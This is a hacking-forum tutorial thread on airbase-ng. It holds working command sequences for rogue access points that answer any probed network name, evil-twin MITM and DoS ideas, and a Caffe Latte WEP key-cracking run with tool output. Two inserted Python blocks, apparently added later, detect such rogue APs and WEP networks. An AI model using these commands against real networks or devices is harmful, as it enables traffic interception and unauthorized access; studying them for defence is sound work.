
Offline proxx

Airbase-ng Getting started (follow ups intended) *Updated.
« on: February 01, 2013, 06:57:43 PM »
Good fcking afternoon EZ (Yes I curse a lot)


Since I feel like contributing to this great community, I figured that Airbase-ng would be nice to introduce to members that are new to this.
A lot of basic wireless hacking material is already here and it would be useless to recap everything.
I myself have spent some time on wireless security, which remains one of my favorite fields.

So let's talk a little about airbase-ng.
Airbase-ng is one of the many tools in the aircrack suite.
It serves as a software access point with a twist.
This tool allows you to create an AP on the fly residing on a monitor interface (promiscuous mode).

So let's take a look at the options this tool offers:
Code:
$airbase-ng --help

  Airbase-ng 1.0 rc3 - (C) 2008, 2009 Thomas d'Otreppe
  Original work: Martin Beck
  http://www.aircrack-ng.org

  usage: airbase-ng <options> <replay interface>

  Options:

      -a bssid         : set Access Point MAC address
      -i iface         : capture packets from this interface
      -w WEP key       : use this WEP key to en-/decrypt packets
      -h MAC           : source mac for MITM mode
      -f disallow      : disallow specified client MACs (default: allow)
      -W 0|1           : [don't] set WEP flag in beacons 0|1 (default: auto)
      -q               : quiet (do not print statistics)
      -v               : verbose (print more messages)
      -A               : Ad-Hoc Mode (allows other clients to peer)
      -Y in|out|both   : external packet processing
      -c channel       : sets the channel the AP is running on
      -X               : hidden ESSID
      -s               : force shared key authentication (default: auto)
      -S               : set shared key challenge length (default: 128)
      -L               : Caffe-Latte WEP attack (use if driver can't send frags)
      -N               : cfrag WEP attack (recommended)
      -x nbpps         : number of packets per second (default: 100)
      -y               : disables responses to broadcast probes
      -0               : set all WPA,WEP,open tags. can't be used with -z & -Z
      -z type          : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
      -Z type          : same as -z, but for WPA2
      -V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
      -F prefix        : write all sent and received frames into pcap file
      -P               : respond to all probes, even when specifying ESSIDs
      -I interval      : sets the beacon interval value in ms
      -C seconds       : enables beaconing of probed ESSID values (requires -P)

  Filter options:
      --bssid MAC      : BSSID to filter/use
      --bssids file    : read a list of BSSIDs out of that file
      --client MAC     : MAC of client to filter
      --clients file   : read a list of MACs out of that file
      --essid ESSID    : specify a single ESSID (default: default)
      --essids file    : read a list of ESSIDs out of that file

      --help           : Displays this usage screen

Only one option is mandatory, which is the interface.
So let's run this baby with no options and see what happens.
First we need to create the monitor interface.
Code:
$airmon-ng start wlan1
Let's fire up airbase-ng
Code:
$airbase-ng mon0
18:21:34  Created tap interface at0
18:21:34  Trying to set MTU on at0 to 1500
18:21:34  Access Point with BSSID 00:00:00:00:00:00 started.
Alright, it started the access point.
Let's see what it looks like with airodump-ng
Code:
airodump-ng mon0


 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID               

 00:00:00:00:00:00    0       51        0    0   4  54   OPN              <length:  0>         


As you can see it's open, so no encryption.
It has no BSSID (hidden).


Let's specify some more options.

Code:
$airbase-ng --essid EVILZONE -c 1 -P mon0
 
BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID               

00:00:00:00:00:00    0       36        0    0   3  54   OPN              EVILZONE           


Alright, as you can see in the help page, the -P option responds to all beacons.
When a roaming client is... uhm, roaming, it basically asks around for the ESSIDs it remembered.
For example, you've been to the airport and connected to their AP(s).
Most OSes and/or tools remember the APs.
It would be kinda annoying to retype a password every time, etc.

For show, I'll run airodump-ng and show you a client that's roaming.

Code:
BSSID              STATION            PWR   Rate    Lost  Packets  Probes                     
                                                                                               
 (not associated)   00:21:5D:6B:8A:XX  -62    0 - 1     31        5  xxx                       



An unassociated client will typically send out probes directed towards any AP it remembered.
Since this is wireless anyone can sniff this :)

Back on topic.
The previously mentioned -P option does something interesting.
Whatever probe the client sends out, airbase-ng responds with: YES THAT'S ME, HELLO, PLEASE, I'M HERE, CONNECT WITH ME.
It's kinda totally retarded and insecure in many ways.
But that's the way it works.

Okay, so we have a softAP set up; the roaming client will ask for the network "Home".
Our machine says: "I am Home".
The client associates.

We need to set up a DHCP server to establish further connection.
This is out of scope and I might add this in later.
Be aware that if the client expects for example a WPA protected network it will send out encrypted packets.
These will make no sense to your machine as it will be unable to decrypt them.

Some interesting uses:

-MITM
Of course: fool the client by being something you're not, get IP-level connectivity, forward its traffic and sniff.
Think about tools like evilgrade, Metasploit, SET, etc.


-Caffe Latte-like attack for WPA.
The Caffe Latte attack, as invented by Vivek Ramachandran (love that guy), allows cracking a WEP key with only a client.
This attack can be applied to WPA.
Of course it can be applied to WEP, which is the original attack.

-DoS
This tool can be used as a DoS tool.
A client will always connect to the strongest AP in range that meets the criteria.
So if the ESSID "Home" is mimicked and the softAP has a stronger signal, the client will connect to this AP.



To Be continued (Out of time)




« Last Edit: February 02, 2013, 11:41:36 AM by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage
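A detection-side view of the probe behaviour this post describes (added example, not code from the original post or from aircrack-ng): over a constructed list of already-parsed management frames it lists which remembered networks each station leaks in its directed probe requests, and flags any BSSID that answers probes for several unrelated ESSIDs, which is what a -P style soft AP looks like on the air. Frame tuples, MACs and ESSIDs are all constructed; a real deployment would fill the list from a sniffer on a monitor-mode interface.

```python
"""Added example: spot probe-answering soft APs and probe-leaking stations.

Input is a constructed list of parsed 802.11 management frames, one tuple per
frame: (subtype, source_mac, essid).  Nothing here touches a real interface.
"""
from collections import defaultdict

BROADCAST_PROBE = ""  # a wildcard probe request carries an empty SSID element

# Constructed sample traffic; 02:00:... addresses are locally administered placeholders.
SAMPLE_FRAMES = [
    ("probe_req",  "02:00:00:00:00:01", "Home"),           # station asks for a remembered network
    ("probe_req",  "02:00:00:00:00:01", "AirportWiFi"),    # ...and another one it remembers
    ("probe_req",  "02:00:00:00:00:01", BROADCAST_PROBE),  # wildcard probe, leaks no name
    ("probe_req",  "02:00:00:00:00:02", "ez"),
    ("probe_resp", "02:00:00:00:00:aa", "Home"),           # one BSSID answering every name asked for
    ("probe_resp", "02:00:00:00:00:aa", "AirportWiFi"),
    ("probe_resp", "02:00:00:00:00:aa", "ez"),
    ("probe_resp", "02:00:00:00:00:bb", "Home"),           # ordinary AP: one ESSID only
    ("beacon",     "02:00:00:00:00:bb", "Home"),
]


def station_probe_leaks(frames):
    """ESSIDs each station reveals through directed (non-wildcard) probe requests."""
    leaks = defaultdict(set)
    for subtype, src, essid in frames:
        if subtype == "probe_req" and essid != BROADCAST_PROBE:
            leaks[src].add(essid)
    return {sta: sorted(names) for sta, names in leaks.items()}


def flag_promiscuous_responders(frames, min_essids=3):
    """BSSIDs whose probe responses carry at least min_essids different ESSIDs.

    A normal AP only answers for the ESSID(s) it is configured with; a soft AP
    started the way `airbase-ng -P` is answers for whatever name is probed.
    """
    answered = defaultdict(set)
    for subtype, src, essid in frames:
        if subtype == "probe_resp":
            answered[src].add(essid)
    return {bssid: sorted(names) for bssid, names in answered.items()
            if len(names) >= min_essids}


if __name__ == "__main__":
    for sta, names in station_probe_leaks(SAMPLE_FRAMES).items():
        print(f"station {sta} probes for: {', '.join(names)}")
    for bssid, names in flag_promiscuous_responders(SAMPLE_FRAMES).items():
        print(f"ALERT {bssid} answers probes for {len(names)} ESSIDs: {names}")
```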

Offline Daemon

Re: Airbase-ng Getting started (follow ups intended).
« Reply #1 on: February 01, 2013, 07:33:12 PM »
As you can see :P
It's off to a great start! I look forward to the continuation of this and hopefully you can do it in the next day or two. The sooner the better. You're planning on doing examples of each type of attack, I'm hoping? That would be pretty sick. Keep it up mate :)
This lifestyle is strictly DIY or GTFO - lucid

Because sexploits are for h0edays - noncetonic


Xires burns the souls of HF skids as a power supply

Offline proxx

Re: Airbase-ng Getting started (follow ups intended).
« Reply #2 on: February 01, 2013, 08:23:36 PM »
Haha, I'm not a native English speaker and would really appreciate any spelling or language corrections.

Thanks Daemon.
I'll add more soon.

Adding some actual sandbox attacks is a good idea, noted.
« Last Edit: February 01, 2013, 08:23:57 PM by proxx »

Offline Daemon

Re: Airbase-ng Getting started (follow ups intended).
« Reply #3 on: February 02, 2013, 12:13:48 AM »
Sandbox or live demos, don't matter.
As for spelling and such it looks good, but if you're worried about it then you're more than welcome to shoot me a PM or email with the tut and I'll do spell correcting and such before sending it back. It'll take around 12-24 hours for me to do so though.

Offline iTpHo3NiX

Re: Airbase-ng Getting started (follow ups intended).
« Reply #4 on: February 02, 2013, 12:56:11 AM »


Just add Ginger ;)


Firefox:
https://addons.mozilla.org/en-us/firefox/addon/ginger-grammar-and-spell-ch/


Chrome:
https://chrome.google.com/webstore/detail/grammar-and-spell-checker/kdfieneakcjfaiglcfcgkidlkmlijjnh


It's not that hard people ;) It gives you a green underline and even checks grammar! It's not that hard to right-click a word with a green underline.
[09:27] (+lenoch) iTpHo3NiX can even manipulate me to suck dick
[09:27] (+lenoch) oh no that's voluntary
[09:27] (+lenoch) sorry

Offline Axon

Re: Airbase-ng Getting started (follow ups intended).
« Reply #5 on: February 02, 2013, 01:31:43 AM »
Great contribution dude, I've been waiting for something about Airbase-ng because it was a bit vague for me, waiting for the second part of this tutorial. +1 and stuff

Offline techb

Re: Airbase-ng Getting started (follow ups intended).
« Reply #6 on: February 02, 2013, 02:31:43 AM »



For Windows and such. Doesn't work under my install of Ubuntu 12.04, works just fine for Windows 7 though...
>>>import this
-----------------------------

Offline proxx

Re: Airbase-ng Getting started (follow ups intended).
« Reply #7 on: February 02, 2013, 09:17:53 AM »
Just for the record, I'm not especially bad at English.
However, if I make mistakes in either spelling or language (especially language) then I would like people to point it out so I can learn from it.
Because I'm no native speaker I will have the tendency to put things in a way that I would in my native language.
This can lead to strange and unwanted results.

Thanks for the replies guys, appreciate it.

I've decided on making a couple of follow-ups.
I'll just cover some more wireless-related stuff.
Probably in small pieces.
« Last Edit: February 02, 2013, 09:22:22 AM by proxx »

Offline proxx

Re: Airbase-ng Getting started (follow ups intended).
« Reply #8 on: February 02, 2013, 11:39:45 AM »
~~~~Continuation~~~~

-On the fly hotspot.
Of course this can be used for good things.
It's pretty easy to create a softAP when needed.
Especially because a lot of drivers/cards don't support master mode.
But hostapd is a far better alternative if your hardware and drivers work.


Some notes here:

Airbase-ng is unstable.
A lot of drivers suck.
Random stability errors, etc.
I don't like to admit it but it's the cold, hard reality.
The madwifi drivers do help, btw.
http://madwifi-project.org/
Worth checking out.
In my personal experience nothing beats Atheros.
Most stable and fastest cards I've worked with, under Linux that is.
Great drivers, great company.



Let's take a look at the Caffe Latte attack.
This was the first client-based attack on wireless, IIRC.
First we create the monitor interface.

Code:
airmon-ng start wlan1

On my phone I've added a new non-existing network with the name ez.
For encryption I've selected WEP.

Code:
$airodump-ng mon0

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                     
                                                                                               
 (not associated)   XX:0C:F3:DF:XX:XX  -62    0 - 1      0        1                           
 (not associated)   XX:25:2C:B6:XX:XX  -62    0 - 1      0        1                           
 (not associated)   XX:E7:D8:0F:XX:XX   -3    0 - 1     26        4  ez   

There it is.
What do we know?
It's probing for the ESSID "ez" and, as far as we know, for nothing else.
What we don't know is the encryption it expects.

Let's see what happens if we create a softAP with the name ez.


Code:
airbase-ng mon0 -a 00:00:00:13:37:00 --essid ez
10:50:14  Created tap interface at0
10:50:14  Trying to set MTU on at0 to 1500
10:50:14  Access Point with BSSID 00:00:00:13:37:00 started.
Okay, wtf.
The station is roaming and actively probing for the network "ez" but it's not associating.
That sucks.
No seriously, the phone can 'see' that the network is open and requires no encryption.
Thus it does not fit the profile.

Let's try that again.
This time we specify an encryption, in this case WEP.


Code:
airbase-ng mon0 -a 00:00:00:13:37:00 --essid ez  -w 12345678901
10:56:13  Created tap interface at0
10:56:13  Trying to set MTU on at0 to 1500
10:56:13  Access Point with BSSID 00:00:00:13:37:00 started.
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"
10:56:16  Client 38:E7:D8:0F:A7:7C associated (WEP) to ESSID: "ez"

Sweet.
The client connected to our AP.

We learned that the client expects WEP.
WEP is totally flawed and can be cracked client-side with the Caffe Latte attack.
I got the attack working, however my phone is acting in a way it shouldn't.
It works, but it's awfully slow for this reason.

Start the softAP.

Code:
airbase-ng mon0  --essid ez  -w 12345678901 -c1 -L
 

11:22:57  Created tap interface at0
11:22:57  Trying to set MTU on at0 to 1500
11:22:57  Access Point with BSSID 00:87:12:19:27:46 started.
11:23:04  Client xx:xx:D8:0F:xx:xx associated (WEP) to ESSID: "ez"



Let's run airodump-ng to capture the packets.

Code:

airodump-ng mon0 --bssid xx:xx:12:19:xx:xx -c1 -w EZ
 
 CH  1 ][ Elapsed: 9 mins ][ 2013-02-02 11:24                                         
                                                                                             
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID           
                                                                                             
 xx:xx:12:19:xx:xx    0 100    10702      100    0   1  54   WEP  WEP    OPN  ez             
                                                                                             
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes                   
                                                                                             
 xx:xx:12:19:xx:xx  xx:xx:D8:0F:xx:xx  -12    0 -54     53      315

Run aircrack to crack the WEP key.

Code:
aircrack-ng EZ-01.cap

                                    Aircrack-ng 1.0 rc3


                        [00:00:02] Tested 2031617 keys (got 57 IVs)

   KB    depth   byte(vote)
    0    0/  1   44( 768) C0( 512) F0( 512) 05( 256) 06( 256) 0D( 256)
    1    0/  2   EC( 512) 7C( 512) 9F( 512) A0( 512) C5( 512) 00( 256)
    2    0/  1   33( 768) C5( 768) 48( 512) F9( 512) 03( 256) 0F( 256)
    3    0/  1   A6( 512) 10( 512) 43( 512) 58( 512) 84( 512) C7( 512)
    4    0/  1   FE( 512) 11( 512) 5D( 512) 75( 512) 8F( 512) 0F( 256)
    5    0/  1   1B( 512) 81( 512) CE( 512) FF( 512) 09( 256) 0A( 256)
    6    0/  1   2A( 512) 68( 512) 9F( 512) A6( 512) C2( 512) F0( 512)
    7    0/  1   F4(1024) 8D( 768) 08( 512) 4E( 512) A8( 512) E0( 512)
    8    0/  1   DB( 512) 35( 512) 38( 512) 97( 512) B1( 512) CC( 512)
    9    0/  1   91( 512) B1( 512) D4( 512) EC( 512) 03( 256) 06( 256)
   10    0/  1   25( 768) 00( 512) 08( 512) 98( 512) A7( 512) C2( 512)
   11    0/  1   0C( 512) 14( 512) 1B( 512) 4D( 512) 81( 512) 82( 512)
   12    0/ 12   30( 440) 4A( 440) 69( 440) 59( 292) F0( 292) 06( 256)



Eventually the key will be cracked.
I'm not running a DHCP server on the interface.
Most devices will default to 169.x.x.x or similar addresses.
My phone however does not, it keeps reconnecting giving me only a few packets per attempt.
If it either receives a DHCP lease or defaults to 169.x.x.x it will start sending ARP packets.
These ARP packets will generate traffic thus speeding up the cracking.

For more information:
http://www.aircrack-ng.org/doku.php?id=cafe-latte


This attack can be applied to WPA and WPA2.
The theory being that when the client associates to the softAP it will send its part of the 4-way handshake.
These packets can be brute-forced in the same way as can be done with an AP.
I might demonstrate this later.

For now I'm sick of typing.




To-Be-Continued.
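An inventory check over the AP table that airodump-ng prints in the layout shown in this post (added example, not part of the post or of aircrack-ng): it parses the rows, then reports any AP that advertises a managed ESSID from an unknown BSSID or with a different ENC than expected (the open "Home"/"ez" twin situation described above), plus any WEP network, whose key the Caffe Latte attack recovers from a single client. The sample output, the 02:00:... MACs and the KNOWN_APS inventory are constructed.

```python
"""Added example: parse airodump-ng's on-screen AP table and compare it with an
inventory of managed networks so a same-name twin or a WEP network stands out."""
import re

# One AP row.  RXQ and the CIPHER/AUTH pair are optional: airodump-ng omits RXQ
# in some layouts and leaves CIPHER/AUTH blank for OPN rows.
AP_ROW = re.compile(
    r"^\s*(?P<bssid>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2})\s+"
    r"(?P<pwr>-?\d+)\s+(?:\d+\s+)?"                      # PWR, optional RXQ
    r"(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<per_sec>\d+)\s+"
    r"(?P<ch>-?\d+)\s+(?P<mb>\d+[e ]?\.?)\s+"            # MB may read '54', '54e.' or '54 .'
    r"(?P<enc>OPN|WEP|WPA\d?)\s+"
    r"(?:(?P<cipher>CCMP|TKIP|WEP(?:40|104)?|WRAP)\s+(?P<auth>PSK|MGT|OPN|SKA)\s+)?"
    r"(?P<essid>.*?)\s*$"
)

# Constructed airodump-ng screen output; 02:00:... MACs are placeholders.
SAMPLE_OUTPUT = """\
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 02:00:00:00:13:37    0 100    10702      100    0   1  54   WEP  WEP    OPN  ez
 02:00:00:00:00:01  -40  90      120       10    0   6  54e. WPA2 CCMP   PSK  Home
 02:00:00:00:00:02  -35 100      300        0    0   6  54   OPN              Home
 02:00:00:00:00:03  -70  80       51        0    0   4  54   OPN              <length:  0>
"""

# Assumed inventory: ESSID -> (BSSID allowed to advertise it, expected ENC column).
KNOWN_APS = {"Home": ("02:00:00:00:00:01", "WPA2")}


def parse_ap_table(text):
    """Return one dict per AP row; unmatched optional fields are None."""
    rows = []
    for line in text.splitlines():
        m = AP_ROW.match(line)
        if m:
            row = m.groupdict()
            row["bssid"] = row["bssid"].lower()
            rows.append(row)
    return rows


def find_rogue_aps(rows, known=KNOWN_APS):
    """(bssid, essid, reason) for every row that contradicts the inventory."""
    findings = []
    for r in rows:
        if r["essid"] in known:
            exp_bssid, exp_enc = known[r["essid"]]
            if r["bssid"] != exp_bssid.lower():
                findings.append((r["bssid"], r["essid"], "unknown BSSID advertising a managed ESSID"))
            if r["enc"] != exp_enc:
                findings.append((r["bssid"], r["essid"], f"{r['enc']} instead of expected {exp_enc}"))
        if r["enc"] == "WEP":  # crackable from one client alone, managed or not
            findings.append((r["bssid"], r["essid"], "WEP: key recoverable from a single client"))
    return findings


if __name__ == "__main__":
    for bssid, essid, reason in find_rogue_aps(parse_ap_table(SAMPLE_OUTPUT)):
        print(f"{bssid}  {essid!r}: {reason}")
```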

 


